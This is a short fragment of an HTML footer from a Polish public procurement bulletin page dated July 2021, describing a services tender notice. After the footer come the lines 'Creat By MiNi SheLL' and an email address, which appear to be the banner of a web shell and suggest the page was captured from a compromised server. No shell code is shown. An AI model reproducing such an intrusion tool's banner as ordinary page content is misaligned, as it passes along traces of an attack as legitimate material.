hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-07-14 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com